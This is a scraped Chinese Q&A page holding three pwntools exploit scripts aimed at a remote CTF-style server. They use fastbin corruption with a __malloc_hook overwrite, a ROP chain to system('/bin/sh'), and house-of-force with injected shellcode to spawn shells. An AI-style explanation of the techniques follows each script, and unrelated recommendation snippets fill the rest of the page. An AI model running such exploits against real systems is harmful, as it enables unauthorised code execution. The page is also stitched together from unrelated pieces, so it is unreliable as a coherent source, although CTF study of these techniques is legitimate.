import os from pwn import * context(log_level='debug',os='linux',arch='amd64') # p = process('./1') p = remote("59.110.164.72",10027) #p = process(['/home/lin/tools/glibc-all-in-one-master/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so','./1'], env = {'LD_PRELOAD' : './libc-2.23.so'}) elf=ELF('./1') libc=ELF('./libc-2.23.so') def menu(choice):     p.sendlineafter(b"Your choice :",str(choice)) menu(1) def create(size,com):     menu(1)     # menu(1)     p.sendlineafter(b"Damage of skill : ",str(size))     p.sendlineafter(b"introduction of skill:",com) def edit_1(idx,size):     menu(2)     p.sendlineafter(b"Index :",str(idx))     p.sendlineafter(b"Damage of skill : ",str(size)) def edit_intro(idx,com):     menu(3)     p.sendlineafter(b"Index :",str(idx))     p.sendlineafter(b"introduction of skill : ",com) def show(idx):     menu(4)     p.sendlineafter(b"Index :",str(idx)) def delete(idx):     menu(5)     p.sendlineafter(b"Index :",str(idx)) create(0x38,b'a'*0x38) create(0x68,b'a'*0x68) create(0x68,b'a'*0x68) create(0x68,b'a'*0x68) # gdb.attach(p) delete(3) edit_intro(0,b"b"*0x38+b"\xb1") delete(1) create(0x40,b"") show(1) p.recvuntil("Introduction : ") libc_base = u64(p.recvuntil(b"\x7f").ljust(8,b"\x00"))-0x3c4c0a print (hex(libc_base)) malloc_hook = libc_base + libc.symbols['__malloc_hook']-0x23 print (hex(malloc_hook)) one = [0x45226,0x4527a,0xf03a4,0xf1247] one_gadget = libc_base + one[3] print (hex(one_gadget)) edit_intro(1,p64(0)*3+p64(0x71)+p64(malloc_hook)) delete(0) delete(1) create(0x68,b"d"*8) # gdb.attach(p,"b *0x400cda") # pause() create(0x68,b"a"*19+p64(one_gadget)) menu(6) menu(2) ## get_shell p.interactive()

时间: 2024-02-26 10:53:22 浏览: 104
这是一段 Python 代码,用于攻击一个程序。你在代码中使用了 pwntools 库来和程序进行交互。在这个攻击中,你创建了四个技能,然后删除了第三个技能。接着,你编辑了第一个技能的简介,将其覆盖为一段长度为 0x38 的字符串加上一个字节为 0xb1 的字符。然后你删除了第一个技能,并创建了一个长度为 0x40 的新技能。你读取了第二个技能的简介,从中获取了程序运行时的 libc 基地址。接着,你计算了一个函数的地址,然后将第二个技能的简介重新编辑,将其覆盖为一段长度为 0x20 的字符串加上一个指向 malloc_hook 的指针。然后你删除了第一个和第二个技能,并创建了两个新技能,最后触发了程序中的一个函数,从而获得了 shell。
相关问题

from pwn import * import struct import os context(os='linux', arch='amd64', log_level='debug') elf = ELF("./Login") libc = ELF("./libc-2.23.so") DEBUG = 0 def exp(p): p.recvuntil("Here is a tip: 0x") std_addr = int(p.recv(12), 16) info("std_addr----->"+hex(std_addr)) libc.address = std_addr - 0x3c48e0 p.recvuntil("input the username:\n") p.send(b"a"*28+b"\xCC\x15\xCC\x15") p.recvuntil("input the password:\n") payload = b"a"*0x28 + p64(0x00000000004008c3) + p64(libc.search(b"/bin/sh").__next__()) + p64(libc.sym["system"]) p.send(payload) p.interactive() def main(): if DEBUG: p = process("./Login") gdb.attach(p, "source ./.gdbinit") exp(p) else: p = remote("59.110.164.72", 10000) exp(p) if __name__ == "__main__": main()这串代码的知识点

这是一段使用 pwntools 库编写的 exploit 脚本,用于攻击一个名为 Login 的程序。该脚本的主要作用是通过溢出 Login 程序的缓冲区来实现攻击,并最终获取一个 shell。 具体来说,该脚本的主要知识点包括: 1. 使用 pwntools 库中的各种函数来与目标程序进行交互,如 `recvuntil`、`send`、`interactive` 等。 2. 使用 `ELF` 类来解析目标程序的 ELF 文件,获取其中的地址信息等。 3. 使用 `libc` ELF 文件中的符号来获取函数地址,如 `search`、`sym` 等。 4. 使用 `gdb` 调试工具来调试目标程序,如 `process`、`attach` 等。 5. 利用栈溢出漏洞来覆盖程序的返回地址,从而实现控制程序流程的目的。 6. 利用泄漏的地址信息计算出 libc 的基地址,从而获取 libc 中的函数地址。 7. 利用 `system` 函数来执行 shell 命令,从而获取 shell。

from pwn import * context(log_level='debug',os='linux',arch='amd64') # p=process('./1') p =remote("59.110.164.72",10025) elf=ELF('./1') shellcode = asm(shellcraft.sh()) # gdb.attach(p,"b *0x400a28") # pause() payload1 =b"\x00"*24 p.sendafter(b"Start injecting\n",payload1) p.recvuntil(b"materials\n") heap_addr = int(p.recv(8),10) print (heap_addr) # heap_addr =int((heap_addr),16) print (hex(heap_addr)) sleep(0.1) p.sendline(str(-1)) #change top_chunk sleep(0.1) p.sendline(str(6296200-heap_addr)) #get_size p.sendafter(b"Answer time is close to over\n","a"*0x10) # gdb.attach(p,"b *0x400b49") # pause() payload2= b"a"*0x60+p64(0x6012a0+0x80+0x120)+p64(0x4008e3)+b"a"*0x10+\ p64(0x6012a0+0x60)+p64(0x400914)+shellcode p.sendafter(b"irect to destination\n",payload2) p.recvuntil(b"you pass") # sleep() p.recv(0x1b0) sleep(0.5) stack = u64(p.recvuntil(b"\x7f").ljust(8,b"\x00"))-0xd0 print(hex(stack)) # gdb.attach(p,"b *0x4008e3") # pause() payload3 = b"a"*0x68+p64(stack) p.sendline(payload3) p.interactive()这串代码的知识点和用处

这段代码是针对一个名为“materials”的程序进行的攻击,该程序存在堆溢出漏洞和栈溢出漏洞。攻击的目的是获取程序的最高权限,实现远程代码执行。 代码中使用了pwntools库,主要实现了以下功能: 1. 构造堆溢出payload,通过修改堆块头部实现伪造chunk。具体地,构造了两个chunk,第一个chunk大小设为负数,通过修改top_chunk的方式使其指向第二个chunk的头部。第二个chunk的大小设为目标位置(0x6012a0+0x80+0x120)与堆基址的差值,即让其覆盖到目标位置上。然后在第二个chunk的尾部构造ROP链实现远程代码执行。 2. 获取栈地址,利用栈溢出漏洞,将ROP链的返回地址修改为栈上的地址,从而在返回时跳转到栈上执行代码。 总的来说,这段代码主要是利用了堆溢出和栈溢出漏洞,通过构造payload实现远程代码执行的攻击。
阅读全文

相关推荐

最新推荐

recommend-type

kali安装ROPgadget报错.docx

在Kali Linux中,`ROPgadget`是一个非常重要的pwn工具,用于在二进制文件中搜索适合的返回导向编程(Return-Oriented Programming, ROP) gadgets。当你尝试安装并运行`ROPgadget`时,遇到的错误是由于安装过程中的...
recommend-type

Deep-Learning-with-PyTorch-by-Eli-Stevens-Luca-Antiga-Thomas-Viehmann

Deep_Learning_with_PyTorch_by_Eli_Stevens_Luca_Antiga_Thomas_Viehmann
recommend-type

Python调试器vardbg:动画可视化算法流程

资源摘要信息:"vardbg是一个专为Python设计的简单调试器和事件探查器,它通过生成程序流程的动画可视化效果,增强了算法学习的直观性和互动性。该工具适用于Python 3.6及以上版本,并且由于使用了f-string特性,它要求用户的Python环境必须是3.6或更高。 vardbg是在2019年Google Code-in竞赛期间为CCExtractor项目开发而创建的,它能够跟踪每个变量及其内容的历史记录,并且还能跟踪容器内的元素(如列表、集合和字典等),以便用户能够深入了解程序的状态变化。" 知识点详细说明: 1. Python调试器(Debugger):调试器是开发过程中用于查找和修复代码错误的工具。 vardbg作为一个Python调试器,它为开发者提供了跟踪代码执行、检查变量状态和控制程序流程的能力。通过运行时监控程序,调试器可以发现程序运行时出现的逻辑错误、语法错误和运行时错误等。 2. 事件探查器(Event Profiler):事件探查器是对程序中的特定事件或操作进行记录和分析的工具。 vardbg作为一个事件探查器,可以监控程序中的关键事件,例如变量值的变化和函数调用等,从而帮助开发者理解和优化代码执行路径。 3. 动画可视化效果:vardbg通过生成程序流程的动画可视化图像,使得算法的执行过程变得生动和直观。这对于学习算法的初学者来说尤其有用,因为可视化手段可以提高他们对算法逻辑的理解,并帮助他们更快地掌握复杂的概念。 4. Python版本兼容性:由于vardbg使用了Python的f-string功能,因此它仅兼容Python 3.6及以上版本。f-string是一种格式化字符串的快捷语法,提供了更清晰和简洁的字符串表达方式。开发者在使用vardbg之前,必须确保他们的Python环境满足版本要求。 5. 项目背景和应用:vardbg是在2019年的Google Code-in竞赛中为CCExtractor项目开发的。Google Code-in是一项面向13到17岁的学生开放的竞赛活动,旨在鼓励他们参与开源项目。CCExtractor是一个用于从DVD、Blu-Ray和视频文件中提取字幕信息的软件。vardbg的开发过程中,该项目不仅为学生提供了一个实际开发经验的机会,也展示了学生对开源软件贡献的可能性。 6. 特定功能介绍: - 跟踪变量历史记录:vardbg能够追踪每个变量在程序执行过程中的历史记录,使得开发者可以查看变量值的任何历史状态,帮助诊断问题所在。 - 容器元素跟踪:vardbg支持跟踪容器类型对象内部元素的变化,包括列表、集合和字典等数据结构。这有助于开发者理解数据结构在算法执行过程中的具体变化情况。 通过上述知识点的详细介绍,可以了解到vardbg作为一个针对Python的调试和探查工具,在提供程序流程动画可视化效果的同时,还通过跟踪变量和容器元素等功能,为Python学习者和开发者提供了强大的支持。它不仅提高了学习算法的效率,也为处理和优化代码提供了强大的辅助功能。
recommend-type

管理建模和仿真的文件

管理Boualem Benatallah引用此版本:布阿利姆·贝纳塔拉。管理建模和仿真。约瑟夫-傅立叶大学-格勒诺布尔第一大学,1996年。法语。NNT:电话:00345357HAL ID:电话:00345357https://theses.hal.science/tel-003453572008年12月9日提交HAL是一个多学科的开放存取档案馆,用于存放和传播科学研究论文,无论它们是否被公开。论文可以来自法国或国外的教学和研究机构,也可以来自公共或私人研究中心。L’archive ouverte pluridisciplinaire
recommend-type

【IT设备维保管理入门指南】:如何制定有效的维护计划,提升设备性能与寿命

![【IT设备维保管理入门指南】:如何制定有效的维护计划,提升设备性能与寿命](https://docs.plesk.com/en-US/onyx/administrator-guide/images/78798.webp) # 摘要 本文全面探讨了IT设备维保管理的各个方面,从理论基础到实践案例,再到技术革新和未来展望。首先概述了维保计划的重要性,强调了其在延长设备生命周期和提升性能稳定性方面的作用。接着,文中详细论述了维保计划的制定原则,包括预防性维护、设备分类及成本效益分析等。通过分析不同行业的实践案例,本文揭示了成功维保计划的关键因素,并提出了效果评估与改进的策略。随后,探讨了性能监
recommend-type

python爬取网页链接,url = “https://koubei.16888.com/57233/0-0-0-0”

在Python中,使用如`requests`库来发送HTTP请求并抓取网页链接是比较常见的做法。以下是如何使用`requests`和BeautifulSoup库(用于解析HTML)来爬取给定URL上的信息: 首先,确保已安装`requests`和`beautifulsoup4`库,如果未安装可以使用以下命令安装: ```bash pip install requests beautifulsoup4 ``` 然后,你可以编写以下Python脚本来爬取指定URL的内容: ```python import requests from bs4 import BeautifulSoup # 定义要
recommend-type

掌握Web开发:Udacity天气日记项目解析

资源摘要信息: "Udacity-Weather-Journal:Web开发路线的Udacity纳米度-项目2" 知识点: 1. Udacity:Udacity是一个提供在线课程和纳米学位项目的教育平台,涉及IT、数据科学、人工智能、机器学习等众多领域。纳米学位是Udacity提供的一种专业课程认证,通过一系列课程的学习和实践项目,帮助学习者掌握专业技能,并提供就业支持。 2. Web开发路线:Web开发是构建网页和网站的应用程序的过程。学习Web开发通常包括前端开发(涉及HTML、CSS、JavaScript等技术)和后端开发(可能涉及各种服务器端语言和数据库技术)的学习。Web开发路线指的是在学习过程中所遵循的路径和进度安排。 3. 纳米度项目2:在Udacity提供的学习路径中,纳米学位项目通常是实践导向的任务,让学生能够在真实世界的情境中应用所学的知识。这些项目往往需要学生完成一系列具体任务,如开发一个网站、创建一个应用程序等,以此来展示他们所掌握的技能和知识。 4. Udacity-Weather-Journal项目:这个项目听起来是关于创建一个天气日记的Web应用程序。在完成这个项目时,学习者可能需要运用他们关于Web开发的知识,包括前端设计(使用HTML、CSS、Bootstrap等框架设计用户界面),使用JavaScript进行用户交互处理,以及可能的后端开发(如果需要保存用户数据,可能会使用数据库技术如SQLite、MySQL或MongoDB)。 5. 压缩包子文件:这里提到的“压缩包子文件”可能是一个笔误或误解,它可能实际上是指“压缩包文件”(Zip archive)。在文件名称列表中的“Udacity-Weather-journal-master”可能意味着该项目的所有相关文件都被压缩在一个名为“Udacity-Weather-journal-master.zip”的压缩文件中,这通常用于将项目文件归档和传输。 6. 文件名称列表:文件名称列表提供了项目文件的结构概览,它可能包含HTML、CSS、JavaScript文件以及可能的服务器端文件(如Python、Node.js文件等),此外还可能包括项目依赖文件(如package.json、requirements.txt等),以及项目文档和说明。 7. 实际项目开发流程:在开发像Udacity-Weather-Journal这样的项目时,学习者可能需要经历需求分析、设计、编码、测试和部署等阶段。在每个阶段,他们需要应用他们所学的理论知识,并解决在项目开发过程中遇到的实际问题。 8. 技术栈:虽然具体的技术栈未在标题和描述中明确提及,但一个典型的Web开发项目可能涉及的技术包括但不限于HTML5、CSS3、JavaScript(可能使用框架如React.js、Angular.js或Vue.js)、Bootstrap、Node.js、Express.js、数据库技术(如上所述),以及版本控制系统如Git。 9. 学习成果展示:完成这样的项目后,学习者将拥有一个可部署的Web应用程序,以及一个展示他们技术能力的项目案例,这些对于未来的求职和职业发展都是有价值的。 10. 知识点整合:在进行Udacity-Weather-Journal项目时,学习者需要将所学的多个知识点融合在一起,包括前端设计、用户体验、后端逻辑处理、数据存储和检索、以及可能的API调用等。 总结来说,Udacity-Weather-Journal项目是Udacity Web开发纳米学位课程中的一个重要实践环节,它要求学习者运用他们所学到的前端和后端开发技能,完成一个具体的Web应用程序项目。通过完成这样的项目,学习者能够将理论知识转化为实践经验,并为他们未来在IT行业的职业发展打下坚实的基础。
recommend-type

"互动学习:行动中的多样性与论文攻读经历"

多样性她- 事实上SCI NCES你的时间表ECOLEDO C Tora SC和NCESPOUR l’Ingén学习互动,互动学习以行动为中心的强化学习学会互动,互动学习,以行动为中心的强化学习计算机科学博士论文于2021年9月28日在Villeneuve d'Asq公开支持马修·瑟林评审团主席法布里斯·勒菲弗尔阿维尼翁大学教授论文指导奥利维尔·皮耶昆谷歌研究教授:智囊团论文联合主任菲利普·普雷教授,大学。里尔/CRISTAL/因里亚报告员奥利维耶·西格德索邦大学报告员卢多维奇·德诺耶教授,Facebook /索邦大学审查员越南圣迈IMT Atlantic高级讲师邀请弗洛里安·斯特鲁布博士,Deepmind对于那些及时看到自己错误的人...3谢谢你首先,我要感谢我的两位博士生导师Olivier和Philippe。奥利维尔,"站在巨人的肩膀上"这句话对你来说完全有意义了。从科学上讲,你知道在这篇论文的(许多)错误中,你是我可以依
recommend-type

【文献整理高效法】:ENDNOTE软件实用功能及快捷操作揭秘

![【文献整理高效法】:ENDNOTE软件实用功能及快捷操作揭秘](https://europe1.discourse-cdn.com/endnote/optimized/2X/a/a18b63333c637eb5d6fafb609a4eff7bd46df6b0_2_1024x391.jpeg) # 摘要 本文综合探讨了ENDNOTE在文献整理和管理中的作用及其高效操作技巧。首先介绍了文献整理的重要性和ENDNOTE软件的简介,随后深入解析了ENDNOTE的基本功能,包括文献信息的导入与管理、引用和参考文献的生成,以及文献搜索与数据库集成。接着,本文详细阐述了ENDNOTE的高效操作技巧,涵
recommend-type

在使用SQL创建存储过程时,是否可以在定义输入参数时直接为其赋予初始值?

在使用SQL创建存储过程时,通常可以在定义输入参数时为其赋予初始值。这种做法可以使参数具有默认值,当调用存储过程时,如果没有提供该参数的值,则会使用默认值。以下是一个示例: ```sql CREATE PROCEDURE MyProcedure @Param1 INT = 10, @Param2 NVARCHAR(50) = 'DefaultValue' AS BEGIN -- 存储过程的主体 SELECT @Param1 AS Param1, @Param2 AS Param2 END ``` 在这个示例中,`@Param1`和`@Param2`是输入参数